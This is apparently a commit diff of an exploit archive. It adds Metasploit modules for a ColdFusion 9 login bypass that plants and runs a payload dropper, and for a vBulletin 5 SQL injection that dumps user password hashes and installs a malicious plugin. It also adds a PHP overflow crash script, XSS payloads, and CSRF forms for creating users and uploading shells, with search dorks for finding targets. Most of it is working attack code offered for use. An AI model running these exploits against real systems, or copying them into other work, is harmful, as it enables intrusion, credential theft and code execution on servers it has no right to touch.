Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

315
platforms/multiple/remote/30210.rb Executable file
View file

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass',
'Description' => %q{
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can
by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that
can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing
authentication on the admin web interface which then could lead to arbitrary code execution.
Tested on Windows and Linux with ColdFusion 9.
},
'Author' =>
[
'Scott Buckel', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ "CVE", "2013-0632" ],
[ "EDB", "27755" ],
[ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive, #thanks juan!
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2013'
))
register_options(
[
OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
], self.class)
register_advanced_options(
[
OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
])
end
def check
uri = target_uri.path
#can we access the admin interface?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good "#{peer} - Administrator access available"
else
return Exploit::CheckCode::Safe
end
#is it cf9?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
})
img = Rex::Text.md5(res.body.to_s)
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
print_good "#{peer} - ColdFusion 9 Detected"
else
return Exploit::CheckCode::Safe
end
#can we access the RDS component?
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
if res and res.code == 200 and res.body.to_s =~ /true/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@pl = gen_file_dropper
@payload_url = ""
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
end
end
def primer
@payload_url = get_uri
upload_payload
end
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
end
end
#task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
#instead we use a CFML filedropper to embed our payload and execute it.
#this also removes the dependancy of using the probe.cfm to execute the file.
def gen_file_dropper
rand_var = rand_text_alpha(8+rand(8))
rand_file = rand_text_alpha(8+rand(8))
if datastore['TARGET'] == 0
rand_file += ".exe"
end
encoded_pl = Rex::Text.encode_base64(generate_payload_exe)
print_status "Building CFML shell..."
#embed payload
shell = ""
shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
#if linux set correct permissions
if datastore['TARGET'] == 1
shell += " mode = \"700\""
end
shell += "/>"
#clean up our evil .cfm
shell += " <cffile action=\"delete\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
#execute our payload!
shell += " <cfexecute"
shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
shell += " arguments = \"\""
shell += " timeout = \"60\"/>"
return shell
end
def exec_payload
uri = target_uri.path
print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
print_status("#{peer} - Executing payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
})
end
def upload_payload
uri = target_uri.path
@filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea
print_status "#{peer} - Trying to upload payload via scheduled task..."
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
end
#deal with annoying cookie data prepending (sunglasses)
cookie = res.get_cookies
if res and res.code == 200 and cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
cookie = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good("#{peer} - Logged in as Administrator!")
else
fail_with(Failure::Unknown, "#{peer} - Login Failed")
end
#get file path gogo
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
'vars_get' => {
'name' => "/CFIDE"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
end
if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
file_path = $1
print_good("#{peer} - File path disclosed! #{file_path}")
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
print_status("#{peer} - Adding scheduled task")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
'vars_post' => {
'TaskName' => taskname,
'Start_Date' => "Nov 1, 2420",
'End_Date' => "",
'Interval' => "",
'ScheduleType' => "Once",
'Operation' => "HTTPRequest",
'ScheduledURL' => @payload_url,
'publish' => "1",
'publish_file' => "#{file_path}\\#{@filename}",
'adminsubmit' => "Submit"
},
'cookie' => cookie
})
unless res and res.code == 200 or res.code == 302 #302s can happen but it still works, http black magic!
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("#{peer} - Running scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'runtask' => taskname,
'timeout' => "0"
},
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/
print_good("#{peer} - Scheduled task completed successfully")
else
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("#{peer} - Deleting scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'action' => "delete",
'task' => taskname
},
'cookie' => cookie
})
unless res and res.code == 200
print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!")
end
end
end

14
platforms/php/remote/30117.php Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/24261/info
PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.
Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects versions prior to PHP 5.2.3.
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

9
platforms/php/remote/30130.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24268/info
PHP is prone to an HTTP-response-header-injection vulnerability because it fails to sanitize user-supplied input.
An attacker can exploit this issue to inject additional cookie attributes into session cookies. This may lead to other attacks.
This issue affects PHP 5.2.3 (and prior versions) and PHP 4.4.7 (and prior versions).
http://www.example.com/session.php/PHPSESSID=ID;INJECTED=ATTRIBUTE;/

458
platforms/php/remote/30212.rb Executable file
View file

@ -0,0 +1,458 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has
been used in the wild since March 2013. This module uses the sqli to extract the
web application's usernames and hashes. With the retrieved information tries to
log into the admin control panel in order to deploy the PHP payload. This module
has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
Linux distribution.
},
'Author' =>
[
'Orestis Kourides', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3522' ],
[ 'OSVDB', '92031' ],
[ 'EDB', '24882' ],
[ 'BID', '58754' ],
[ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'Space' => 10000 # Just value big enough to fit any php payload
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
'DisclosureDate' => 'Mar 25 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
OptInt.new("NODE", [false, 'Valid Node ID']),
OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
], self.class)
end
def exists_node?(id)
mark = rand_text_alpha(8 + rand(5))
result = do_sqli(id, "select '#{mark}'")
if result and result =~ /#{mark}/
return true
end
return false
end
def brute_force_node
min = datastore["MINNODE"]
max = datastore["MAXNODE"]
if min > max
print_error("#{peer} - MINNODE can't be major than MAXNODE")
return nil
end
for node_id in min..max
if exists_node?(node_id)
return node_id
end
end
return nil
end
def get_node
if datastore['NODE'].nil? or datastore['NODE'] <= 0
print_status("#{peer} - Brute forcing to find a valid node id...")
return brute_force_node
end
print_status("#{peer} - Checking node id #{datastore['NODE']}...")
if exists_node?(datastore['NODE'])
return datastore['NODE']
else
return nil
end
end
def do_sqli(node, query)
mark = Rex::Text.rand_text_alpha(5 + rand(3))
random_and = Rex::Text.rand_text_numeric(4)
injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
injection << "AND (#{random_and}=#{random_and}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'vars_post' =>
{
'nodeid' => "#{node}#{injection}",
}
})
unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
return nil
end
data = ""
if res.body.to_s =~ /#{mark}(.*)#{mark}/
data = $1
end
return data
end
def get_user_data(node_id, user_id)
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
return [user, pass, salt]
end
def do_login(user, hash)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "login.php"),
'method' => 'POST',
'encode_params' => false,
'vars_get' => {
'do' => 'login'
},
'vars_post' => {
'url' => '%2Fadmincp%2F',
'securitytoken' => 'guest',
'logintype' => 'cplogin',
'do' => 'login',
'vb_login_md5password' => hash,
'vb_login_md5password_utf' => hash,
'vb_login_username' => user,
'vb_login_password' => '',
'cssprefs' => ''
}
})
if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
session = res.get_cookies
else
return nil
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "/"),
'cookie' => session
})
if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
return session
else
return nil
end
end
def get_token(response)
token_info = {
:session_hash => "",
:security_token => "",
:admin_hash => ""
}
if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
token_info[:session_hash] = $1
end
if response =~ /var ADMINHASH = "([0-9a-f]+)";/
token_info[:admin_hash] = $1
end
if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
token_info[:security_token] = $1
end
return token_info
end
def get_install_token
res = send_request_cgi({
"uri" => normalize_uri(target_uri.path, "admincp", "product.php"),
"vars_get" => {
"do" => "productadd"
},
"cookie" => @session
})
unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return nil
end
return get_token(res.body.to_s)
end
def install_product(token_info)
xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>
<product productid="#{@product_id}" active="0">
<title>#{@product_id}</title>
<description>#{@product_id}</description>
<version>1.0</version>
<url>http://#{@product_id}.loc</url>
<versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
<dependencies>
<dependency dependencytype="vbulletin" minversion="" maxversion="" />
</dependencies>
<codes>
<code version="*">
<installcode>
<![CDATA[
#{payload.encoded}
]]>
</installcode>
<uninstallcode />
</code>
</codes>
<templates>
</templates>
<stylevardfns>
</stylevardfns>
<stylevars>
</stylevars>
<hooks>
</hooks>
<phrases>
</phrases>
<options>
</options>
<helptopics>
</helptopics>
<cronentries>
</cronentries>
<faqentries>
</faqentries>
<widgets>
</widgets>
</product>
EOF
post_data = Rex::MIME::Message.new
post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
# Work around an incompatible MIME implementation
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => @session,
'vars_get' => {
"do" => "productimport"
},
'data' => data
})
if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
return true
elsif res
fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
else
return false
end
end
def get_delete_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'cookie' => @session,
'vars_get' => {
"do" => "productdelete",
"productid" => @product_id,
"s" => @session_hash
}
})
if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return get_token(res.body.to_s)
end
return nil
end
def delete_product(token_info)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'cookie' => @session,
'vars_get' => {
"do" => "productkill"
},
'vars_post' => {
"s" => token_info[:session_hash],
"do" => "productkill",
"adminhash" => token_info[:admin_hash],
"securitytoken" => token_info[:security_token],
"productid" => @product_id
}
})
if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
return true
end
return false
end
def check
node_id = get_node
unless node_id.nil?
return Msf::Exploit::CheckCode::Vulnerable
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "index.php")
})
if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
return Msf::Exploit::CheckCode::Detected
end
return Msf::Exploit::CheckCode::Unknown
end
def on_new_session(session)
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end
print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end
def exploit
print_status("#{peer} - Checking for a valid node id...")
node_id = get_node
if node_id.nil?
print_error("#{peer} - node id not found")
return
end
print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
data = do_sqli(node_id, "select count(*) from user")
if data.empty?
print_error("#{peer} - Error exploiting sqli")
return
end
count_users = data.to_i
users = []
print_good("#{peer} - #{count_users} users found")
for i in 0..count_users - 1
user = get_user_data(node_id, i)
report_auth_info({
:host => rhost,
:port => rport,
:user => user[0],
:pass => user[1],
:type => "hash",
:sname => (ssl ? "https" : "http"),
:proof => "salt: #{user[2]}" # Using proof to store the hash salt
})
users << user
end
@session = nil
users.each do |user|
print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
@session = do_login(user[0], user[1])
unless @session.blank?
print_good("#{peer} - Logged in successfully as #{user[0]}")
break
end
end
if @session.blank?
fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
end
print_status("#{peer} - Getting the install product security token...")
install_token = get_install_token
if install_token.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
end
@session_hash = install_token[:session_hash]
@product_id = rand_text_alpha_lower(5 + rand(8))
print_status("#{peer} - Installing the malicious product #{@product_id}...")
if install_product(install_token)
print_good("#{peer} - Product successfully installed... payload should be executed...")
else
# Two situations trigger this path:
# 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
# 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
# Because of that fail_with isn't used here.
return
end
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end
print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end
end

1
platforms/php/webapps/10600.txt
View file

@ -1,4 +1,3 @@
#############################################################
# mypage0.4 LFI Vulnerability

2
platforms/php/webapps/12004.txt
View file

@ -21,7 +21,7 @@
<tr>
<td>
<textarea name="execcommand" cols="60" rows="3">
</textarea>
&lt;/textarea&gt;
</td>
</tr>

1
platforms/php/webapps/12563.txt
View file

@ -1,4 +1,3 @@
______ _ _ _
| ___ \ | | | | (_)
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __

2
platforms/php/webapps/30002.txt
View file

@ -19,6 +19,8 @@
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################
##############

72
platforms/php/webapps/30057.txt
View file

@ -1,72 +0,0 @@
----------------------------------------------------------
openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability
----------------------------------------------------------
[-] Software Link:
http://www.opensis.com/
[-] Affected Versions:
All versions from 4.5 to 5.2.
[-] Vulnerability Description:
The vulnerable code is located in the /ajax.php script:
86. if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
87. {
88. if($_REQUEST['_openSIS_PDF']=='true')
89. ob_start();
90. if(strpos($_REQUEST['modname'],'?')!==false)
91. {
92. $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
93. $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
94.
95. $vars = explode('?',$vars);
96. foreach($vars as $code)
97. {
98. $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';");
99. eval($code);
100. }
101. }
User input passed through the "modname" request variable is not properly sanitized before being used in
a call to the eval() function at line 99. This can be exploited to inject and execute arbitrary PHP code.
[-] Solution:
As of December 5th, 2013 the only solution is this patch: http://sourceforge.net/p/opensis-ce/code/1009
[-] Disclosure Timeline:
[04/12/2012] - Issue reported to http://sourceforge.net/p/opensis-ce/bugs/59/
[28/12/2012] - Vendor contacted, replied that the next version will fix the issue
[12/01/2013] - CVE number requested
[14/01/2013] - CVE number assigned
[26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
[12/05/2013] - Vendor contacted again
[15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
[04/12/2013] - After one year still no official solution available
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1349 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-10

37
platforms/php/webapps/30105.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Wordpress Plugin: Wordpress Download Manager Free & Pro
Persistent Cross Site Scripting
# Google Dork:
# Date: 12-06-2013
# Exploit Author: IT Nerdbox
# Vendor Homepage: http://www.wpdownloadmanager.com # Software Link:
http://downloads.wordpress.org/plugin/download-manager.zip
# Version: v3.3.8
# Tested on: Wordpress 3.7.1 on Linux CentOS # CVE : N/A
When creating a new download package you need to enter a title, description
and the file(s) that you want to be available for download. The title input
field is not sanitized and therefor vulnerable to persistent cross site
scripting. The payload used is <input onmouseover=prompt(document.cookie)>
More information, including screenshots, can be found at:
http://www.nerdbox.it/wordpress-download-manager-xss/

171
platforms/php/webapps/30107.txt Executable file
View file

@ -0,0 +1,171 @@
###########################################################
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] version: Ovidentia 7.9.6
[~]Vendor Homepage: http://www.ovidentia.org/
[~] vulnerable app link:http://www.ovidentia.org/telecharger
###########################################################
[1]SQL injection vulnerability
Log into admin panel and access delegate functionality > managing
administrators where &id parameter (shown below link) is vulnerable to sql
injection
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1
POC by sajith shetty:
request:
GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=
response:
style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.
[2]CSRF vulnerability
log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]"
value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
[3]Reflected XSS
http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x
onerror=prompt(1);>
request:
GET
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
response:
<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a> 
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->
[4]Stored xss
log into the admin portal and access mail functionlity and create new
domain using link below
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
here Name & Description field is vulnerable to stored XSS .payload:"><img
src=x onerror=prompt(1);>
request:
POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen
response:
<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img
src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>

48
platforms/php/webapps/30108.txt Executable file
View file

@ -0,0 +1,48 @@
#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 08/12/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
CSRF File Upload Vulnerability
Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">
<br>
</br>
<input name="uploadfile[]" type="file" />
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
File Access :
http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php
Note :
Script CSRF equate with dork you use
########################################
#Greetz : SANJUNGAN JIWA , Exploit - DB , 1337 Day
#Thanks : Akira | Xie Log | - SANJUNGAN JIWA
########################################

9
platforms/php/webapps/30109.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24236/info
